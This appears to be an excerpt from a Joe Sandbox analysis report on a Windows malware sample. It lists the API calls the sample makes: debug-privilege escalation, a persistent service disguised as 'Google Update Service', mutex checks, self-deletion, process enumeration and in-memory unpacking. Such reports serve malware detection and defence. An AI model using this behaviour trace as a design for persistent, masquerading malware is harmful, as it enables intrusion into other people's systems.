    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 018F2FD0
    • PostMessageA.USER32(?,00000100,00000027,00000000), ref: 018F2FDA
    • PostMessageA.USER32(?,00000201,00000000,00000000), ref: 018F2FE8
    • DefWindowProcA.USER32(?,00000121,?,?), ref: 018F2FF8
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd

    Executed Functions

    APIs
    • HeapCreate.KERNEL32(00040000,00400000,00000000), ref: 004031EF
    • lstrcpy.KERNEL32(?,qwererthwebfsdvjaf+), ref: 0040320E
      • Part of subcall function 00401070: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000008), ref: 00401090
      • Part of subcall function 00401070: CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?), ref: 004010B0
      • Part of subcall function 00401070: VirtualAlloc.KERNEL32(00000000,00000015,00003000,00000004), ref: 004010C9
      • Part of subcall function 00401070: CryptHashData.ADVAPI32(?,00000000,00000014,00000013), ref: 00401102
      • Part of subcall function 00401070: CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000013), ref: 00401128
      • Part of subcall function 00401070: CryptGetHashParam.ADVAPI32(?,00000002,00000014,00000014,00000000), ref: 00401154
      • Part of subcall function 00401070: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401169
      • Part of subcall function 00401070: CryptDestroyHash.ADVAPI32(?), ref: 00401176
      • Part of subcall function 00401070: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00401183
    • ExitProcess.KERNEL32(00000000), ref: 004032D1
      • Part of subcall function 00401000: GetCurrentProcess.KERNEL32 ref: 0040100F
      • Part of subcall function 00401000: OpenProcessToken.ADVAPI32(00000000), ref: 00401016
      • Part of subcall function 00401000: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00401031
      • Part of subcall function 00401000: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 0040104F
      • Part of subcall function 00401000: CloseHandle.KERNEL32(?), ref: 0040105B
    • StartServiceCtrlDispatcherW.ADVAPI32 ref: 004032B9
      • Part of subcall function 00402BB0: GetModuleFileNameW.KERNEL32(00000000,?,00000168,?,00000000), ref: 00402BCA
      • Part of subcall function 00402BB0: GetWindowsDirectoryW.KERNEL32(?,00000168,?,00000000), ref: 00402BDC
      • Part of subcall function 00402BB0: lstrcatW.KERNEL32(?,00404258), ref: 00402BF4
      • Part of subcall function 00402BB0: StrStrIW.SHLWAPI(?,?), ref: 00402C0A
      • Part of subcall function 00402BB0: lstrcatW.KERNEL32(?,?), ref: 00402C28
      • Part of subcall function 00402BB0: lstrcatW.KERNEL32(?,.exe), ref: 00402C36
      • Part of subcall function 00402BB0: ExitProcess.KERNEL32(00000000), ref: 00402C68
      • Part of subcall function 00402BB0: GetCommandLineW.KERNEL32(?,00000000), ref: 00402C6E
      • Part of subcall function 00402BB0: StrStrIW.SHLWAPI(00000000,?), ref: 00402C7E
      • Part of subcall function 00402BB0: DeleteFileW.KERNEL32(00000000), ref: 00402C8D
      • Part of subcall function 00402BB0: Sleep.KERNEL32(00000064), ref: 00402C9D
      • Part of subcall function 00402BB0: DeleteFileW.KERNEL32(00000000), ref: 00402CA5
      • Part of subcall function 00402BB0: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00402CC6
      • Part of subcall function 00402BB0: CloseHandle.KERNEL32(00000000), ref: 00402CD1
      • Part of subcall function 00402BB0: ExitProcess.KERNEL32(00000000,?,00000000), ref: 00402CD9
      • Part of subcall function 00402DC0: GetModuleFileNameW.KERNEL32(00000000,?,00000168,?,00000000), ref: 00402DDA
      • Part of subcall function 00402DC0: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00402DEF
      • Part of subcall function 00402DC0: StrStrIW.SHLWAPI(?,Roaming), ref: 00402E07
      • Part of subcall function 00402DC0: lstrcpyW.KERNEL32(00000000,Local), ref: 00402E13
      • Part of subcall function 00402DC0: lstrcatW.KERNEL32(?,00404258), ref: 00402E2B
      • Part of subcall function 00402DC0: lstrlenW.KERNEL32(?), ref: 00402E34
      • Part of subcall function 00402DC0: StrStrIW.SHLWAPI(?,?), ref: 00402E52
      • Part of subcall function 00402DC0: StrStrIW.SHLWAPI(?,temp), ref: 00402E68
      • Part of subcall function 00402DC0: GetCommandLineW.KERNEL32 ref: 00402E72
      • Part of subcall function 00402DC0: StrStrIW.SHLWAPI(00000000,?), ref: 00402E82
      • Part of subcall function 00402DC0: DeleteFileW.KERNEL32(00000000), ref: 00402E91
      • Part of subcall function 00402DC0: Sleep.KERNEL32(00000064), ref: 00402EA1
      • Part of subcall function 00402DC0: DeleteFileW.KERNEL32(00000000), ref: 00402EA9
      • Part of subcall function 00402DC0: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00402EC6
      • Part of subcall function 00402DC0: CloseHandle.KERNEL32(00000000), ref: 00402ED1
      • Part of subcall function 00402DC0: ExitProcess.KERNEL32(00000000,?,00000000), ref: 00402ED9
      • Part of subcall function 00402DC0: lstrcatW.KERNEL32(?,?), ref: 00402F41
      • Part of subcall function 00402DC0: lstrcatW.KERNEL32(?,.exe), ref: 00402F4F
      • Part of subcall function 00402DC0: ExitProcess.KERNEL32(00000000), ref: 00402F81
      • Part of subcall function 00402DC0: RegisterServiceCtrlHandlerW.ADVAPI32(Google Update Service,004030D0), ref: 00402F9B
      • Part of subcall function 00402DC0: SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00402FFF
      • Part of subcall function 00402DC0: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040300A
      • Part of subcall function 00402DC0: RtlGetLastWin32Error.NTDLL ref: 00403025
      • Part of subcall function 00402DC0: SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00403042
      • Part of subcall function 00402DC0: SetServiceStatus.ADVAPI32(00000000,00405014), ref: 00403072
      • Part of subcall function 00402DC0: CreateThread.KERNEL32(00000000,00000000,00403130,00000000), ref: 0040307E
      • Part of subcall function 00402DC0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403087
      • Part of subcall function 00402DC0: CloseHandle.KERNEL32(FFFFFFFF), ref: 00403093
      • Part of subcall function 00402DC0: SetServiceStatus.ADVAPI32(00000000,00405014), ref: 004030C1
      • Part of subcall function 004025A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004025B8
      • Part of subcall function 004025A0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004025C8
      • Part of subcall function 004025A0: lstrcmpiW.KERNEL32(?,00000000), ref: 004025EB
      • Part of subcall function 004025A0: Process32NextW.KERNEL32(00000000,0000022C), ref: 0040260A
      • Part of subcall function 004025A0: CloseHandle.KERNEL32(00000000), ref: 00402618
      • Part of subcall function 004025A0: RtlGetLastWin32Error.NTDLL ref: 0040261E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 00438810
    • ??2@YAPAXI@Z.CRTDLL(00000400), ref: 0043881B
    • lstrcpyW.KERNEL32(?,?), ref: 0043883D
    • lstrcatW.KERNEL32(?,\ini.txt), ref: 0043884F
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0043886E
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00438883
    • ReadFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004388A1
    • MessageBoxW.USER32(00000000,?,Read file error,00000000), ref: 004388C8
    • CloseHandle.KERNEL32(000000FF), ref: 004388D9
    • ??2@YAPAXI@Z.CRTDLL(00000FFF), ref: 004388E4
    • CreateWindowExW.USER32 ref: 00438926
    • CreateWindowExW.USER32 ref: 0043895F
    • LoadLibraryW.KERNEL32(Riched32.dll), ref: 0043896F
    • CreateWindowExW.USER32 ref: 004389A2
    • CreateWindowExW.USER32 ref: 004389DB
    • CreateWindowExW.USER32 ref: 00438A11
    • CreateWindowExW.USER32 ref: 00438A49
    • CreateWindowExW.USER32 ref: 00438A82
    • CreateWindowExW.USER32 ref: 00438ABB
    • SendMessageW.USER32(?,00000465,00000000,00000000), ref: 00438AD9
    • CreateWindowExW.USER32 ref: 00438B0D
    • SendMessageW.USER32(00000000,00000443,00000000,000010FF), ref: 00438B37
    • SendMessageW.USER32(?,000004C9,00000000,00000000), ref: 00438B73
    • SendMessageW.USER32(00000000,00000443,00000000,000020FF), ref: 00438B93
    • DestroyWindow.USER32(00000000), ref: 00438BA3
      • Part of subcall function 00437BC0: EndDialog.USER32(?,?), ref: 00437C47
    • DialogBoxParamW.USER32(27C0AB09,00000067,?,Function_00037BF0,00000000), ref: 00438C06
    • DestroyWindow.USER32(?), ref: 00438C12
    • DefWindowProcW.USER32(?,?,?,?), ref: 00438C2A
    • BeginPaint.USER32(?,?), ref: 00438C3C
    • EndPaint.USER32(?,?), ref: 00438C50
    • PostQuitMessage.USER32(00000000), ref: 00438C5A
    • DefWindowProcW.USER32(?,?,?,?), ref: 00438C72
    Strings
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000168,?,00000000), ref: 00402BCA
    • GetWindowsDirectoryW.KERNEL32(?,00000168,?,00000000), ref: 00402BDC
    • lstrcatW.KERNEL32(?,00404258), ref: 00402BF4
    • StrStrIW.SHLWAPI(?,?), ref: 00402C0A
    • lstrcatW.KERNEL32(?,?), ref: 00402C28
    • lstrcatW.KERNEL32(?,.exe), ref: 00402C36
      • Part of subcall function 00401320: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401344
      • Part of subcall function 00401320: GetFileSize.KERNEL32(00000000,00000000), ref: 00401353
      • Part of subcall function 00401320: CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00401377
      • Part of subcall function 00401320: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004013C6
      • Part of subcall function 00401320: SetFilePointer.KERNEL32(00000000,-00000200,00000000,00000000), ref: 004013D6
      • Part of subcall function 00401320: ReadFile.KERNEL32(00000000,?,00000200,00000000,00000000), ref: 004013FA
      • Part of subcall function 00401320: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00401427
      • Part of subcall function 00401320: CloseHandle.KERNEL32(00000000), ref: 00401457
      • Part of subcall function 00401320: CloseHandle.KERNEL32(00000000), ref: 0040145E
    • ExitProcess.KERNEL32(00000000), ref: 00402C68
      • Part of subcall function 00401550: lstrlenW.KERNEL32(?), ref: 0040155C
      • Part of subcall function 00401550: RtlAllocateHeap.NTDLL(00970000,00000008,00000000), ref: 00401572
      • Part of subcall function 00401550: lstrlenW.KERNEL32(|/@), ref: 004015A1
      • Part of subcall function 00401550: RtlAllocateHeap.NTDLL(00970000,00000008), ref: 004015B7
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004015CD
      • Part of subcall function 00401550: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040163F
      • Part of subcall function 00401550: CloseHandle.KERNEL32(?), ref: 00401653
      • Part of subcall function 00401550: CloseHandle.KERNEL32(?), ref: 00401659
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040166A
      • Part of subcall function 00401550: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401676
    • GetCommandLineW.KERNEL32(?,00000000), ref: 00402C6E
    • StrStrIW.SHLWAPI(00000000,?), ref: 00402C7E
    • DeleteFileW.KERNEL32(00000000), ref: 00402C8D
    • Sleep.KERNEL32(00000064), ref: 00402C9D
    • DeleteFileW.KERNEL32(00000000), ref: 00402CA5
      • Part of subcall function 004023A0: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 004023AA
      • Part of subcall function 004023A0: CreateServiceW.ADVAPI32(00000000,googleupdate,Google Update Service,000F01FF,00000010,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,7C831F63), ref: 004023E4
      • Part of subcall function 004023A0: RtlGetLastWin32Error.NTDLL ref: 004023EE
      • Part of subcall function 004023A0: OpenServiceW.ADVAPI32(00000000,googleupdate,000F01FF), ref: 00402406
      • Part of subcall function 004023A0: DeleteService.ADVAPI32(00000000,?,00402CB7,?,?,00000000), ref: 00402413
      • Part of subcall function 004023A0: CloseServiceHandle.ADVAPI32(00000000), ref: 0040241C
      • Part of subcall function 004023A0: CloseServiceHandle.ADVAPI32(00000000), ref: 00402427
      • Part of subcall function 004023A0: CloseServiceHandle.ADVAPI32(00000000), ref: 0040243C
      • Part of subcall function 004023A0: CloseServiceHandle.ADVAPI32(00000000), ref: 0040243F
    • OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00402CC6
    • CloseHandle.KERNEL32(00000000), ref: 00402CD1
    • ExitProcess.KERNEL32(00000000,?,00000000), ref: 00402CD9
      • Part of subcall function 00402B10: RtlRestoreLastWin32Error.NTDLL(00000000), ref: 00402B4F
      • Part of subcall function 00402B10: OpenProcess.KERNEL32(00000408,00000000,00000340), ref: 00402B5D
      • Part of subcall function 00402B10: CloseHandle.KERNEL32(00000000), ref: 00402B6F
      • Part of subcall function 00402B10: RtlGetLastWin32Error.NTDLL ref: 00402B77
      • Part of subcall function 00402B10: OpenProcess.KERNEL32(00000408,00000000,00000340), ref: 00402B85
      • Part of subcall function 00402B10: CloseHandle.KERNEL32(00000000), ref: 00402B97
      • Part of subcall function 00402B10: GetModuleHandleW.KERNEL32(00000000), ref: 00402B9F
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(00000000), ref: 004011A4
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(1/@), ref: 004011DE
      • Part of subcall function 00401190: QueryPerformanceCounter.KERNEL32(?), ref: 00401228
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • lstrlenW.KERNEL32(?), ref: 0040155C
    • RtlAllocateHeap.NTDLL(00970000,00000008,00000000), ref: 00401572
    • lstrlenW.KERNEL32(|/@), ref: 004015A1
    • RtlAllocateHeap.NTDLL(00970000,00000008), ref: 004015B7
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 004015CD
    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040163F
    • CloseHandle.KERNEL32(?), ref: 00401653
    • CloseHandle.KERNEL32(?), ref: 00401659
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040166A
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 00401676
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000008), ref: 00401090
    • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?), ref: 004010B0
    • VirtualAlloc.KERNEL32(00000000,00000015,00003000,00000004), ref: 004010C9
    • CryptHashData.ADVAPI32(?,00000000,00000014,00000013), ref: 00401102
    • CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000013), ref: 00401128
    • CryptGetHashParam.ADVAPI32(?,00000002,00000014,00000014,00000000), ref: 00401154
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401169
    • CryptDestroyHash.ADVAPI32(?), ref: 00401176
    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00401183
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00401493
    • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 004014B3
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 004014D3
    • RtlGetLastWin32Error.NTDLL ref: 004014D5
    • RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 004014EE
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 00401509
    • EqualSid.ADVAPI32(00000000,?), ref: 00401516
    • RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040152F
    • CloseHandle.KERNEL32(?), ref: 0040153B
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401344
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00401353
    • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00401377
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004013C6
    • SetFilePointer.KERNEL32(00000000,-00000200,00000000,00000000), ref: 004013D6
    • ReadFile.KERNEL32(00000000,?,00000200,00000000,00000000), ref: 004013FA
    • WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00401427
    • CloseHandle.KERNEL32(00000000), ref: 00401457
      • Part of subcall function 00401290: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004012A6
      • Part of subcall function 00401290: SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 004012B5
      • Part of subcall function 00401290: ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004012D1
      • Part of subcall function 00401290: WriteFile.KERNEL32(00000000,?,00000000,00000000), ref: 004012F5
    • CloseHandle.KERNEL32(00000000), ref: 0040145E
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • LoadIconW.USER32(?,0000006B), ref: 0042BF95
    • LoadCursorW.USER32(00000000,00007F00), ref: 0042BFA5
    • LoadIconW.USER32(?,0000006C), ref: 0042BFC9
    • RegisterClassExW.USER32(00000030), ref: 0042BFD6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 003E014E
    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 003E0275
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 003E029A
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 003E02EE
    • LoadLibraryA.KERNEL32(?), ref: 003E0339
    • VirtualProtect.KERNEL32(?,00001000,00000002,?), ref: 003E0433
    • VirtualProtect.KERNEL32(?,?,00000001,?,?), ref: 003E0482
    Memory Dump Source
    • Source File: 00000004.00000002.314754272.003E0000.00000040.sdmp, Offset: 003E0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3e0000_PTnbUd10.jbxd
    APIs
    • LoadStringW.USER32(?,00000067,0047B940,00000064), ref: 0041A8A3
    • LoadStringW.USER32(?,0000006D,0047BA08,00000064), ref: 0041A8B6
      • Part of subcall function 0042BF60: LoadIconW.USER32(?,0000006B), ref: 0042BF95
      • Part of subcall function 0042BF60: LoadCursorW.USER32(00000000,00007F00), ref: 0042BFA5
      • Part of subcall function 0042BF60: LoadIconW.USER32(?,0000006C), ref: 0042BFC9
      • Part of subcall function 0042BF60: RegisterClassExW.USER32(00000030), ref: 0042BFD6
      • Part of subcall function 00438D40: CreateWindowExW.USER32 ref: 00438D75
      • Part of subcall function 00438D40: ShowWindow.USER32(00000000,?), ref: 00438D90
      • Part of subcall function 00438D40: UpdateWindow.USER32(00000000), ref: 00438D9A
    • LoadAcceleratorsW.USER32(?,0000006D), ref: 0041A8E6
    • GetMessageW.USER32(0012FF68,00000000,00000000,00000000), ref: 0041A8F9
    • TranslateAcceleratorW.USER32(?,00000000,0012FF68), ref: 0041A90F
    • TranslateMessage.USER32(0012FF68), ref: 0041A91D
    • DispatchMessageW.USER32(0012FF68), ref: 0041A927
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 0040100F
    • OpenProcessToken.ADVAPI32(00000000), ref: 00401016
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00401031
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 0040104F
    • CloseHandle.KERNEL32(?), ref: 0040105B
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004025B8
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004025C8
    • lstrcmpiW.KERNEL32(?,00000000), ref: 004025EB
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040260A
    • CloseHandle.KERNEL32(00000000), ref: 00402618
    • RtlGetLastWin32Error.NTDLL ref: 0040261E
    Memory Dump Source
    • Source File: 00000004.00000002.314783051.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000002.314772170.00400000.00000002.sdmp
    • Associated: 00000004.00000002.314789999.00404000.00000002.sdmp
    • Associated: 00000004.00000002.314795405.00405000.00000004.sdmp
    • Associated: 00000004.00000002.314805556.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_PTnbUd10.jbxd
    APIs
    • CreateWindowExW.USER32 ref: 00438D75
    • ShowWindow.USER32(00000000,?), ref: 00438D90
    • UpdateWindow.USER32(00000000), ref: 00438D9A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • __GetMainArgs.CRTDLL(0012FF84,0012FF88,0012FF8C), ref: 00417749
    • _initterm.CRTDLL(0045C0DC,0045C0E0), ref: 0041775B
    • GetStartupInfoA.KERNEL32(0012FF38), ref: 004177B2
    • GetModuleHandleA.KERNEL32(00000000), ref: 004177CD
      • Part of subcall function 0041A890: LoadStringW.USER32(?,00000067,0047B940,00000064), ref: 0041A8A3
      • Part of subcall function 0041A890: LoadStringW.USER32(?,0000006D,0047BA08,00000064), ref: 0041A8B6
      • Part of subcall function 0041A890: LoadAcceleratorsW.USER32(?,0000006D), ref: 0041A8E6
      • Part of subcall function 0041A890: GetMessageW.USER32(0012FF68,00000000,00000000,00000000), ref: 0041A8F9
      • Part of subcall function 0041A890: TranslateAcceleratorW.USER32(?,00000000,0012FF68), ref: 0041A90F
      • Part of subcall function 0041A890: TranslateMessage.USER32(0012FF68), ref: 0041A91D
      • Part of subcall function 0041A890: DispatchMessageW.USER32(0012FF68), ref: 0041A927
    • exit.CRTDLL(00000000,00000000,?,0000000A), ref: 004177DA
    Memory Dump Source
    • Source File: 00000004.00000001.250352668.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000004.00000001.250339391.00400000.00000002.sdmp
    • Associated: 00000004.00000001.250417259.0045C000.00000002.sdmp
    • Associated: 00000004.00000001.250443181.00463000.00000008.sdmp
    • Associated: 00000004.00000001.250473245.0047B000.00000004.sdmp
    • Associated: 00000004.00000001.250493441.0047C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_1_400000_PTnbUd10.jbxd
    APIs
    • RtlGetLastWin32Error.NTDLL ref: 00402636
    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 0040263E
    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00402650
      • Part of subcall function 00401480: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00401493
      • Part of subcall function 00401480: CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 004014B3
      • Part of subcall function 00401480: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 004014D3
      • Part of subcall function 00401480: RtlGetLastWin32Error.NTDLL ref: 004014D5
      • Part of subcall function 00401480: RtlAllocateHeap.NTDLL(00970000,00000008,?), ref: 004014EE
      • Part of subcall function 00401480: GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 00401509
      • Part of subcall function 00401480: EqualSid.ADVAPI32(00000000,?), ref: 00401516
      • Part of subcall function 00401480: RtlFreeHeap.NTDLL(00970000,00000000,00000000), ref: 0040152F
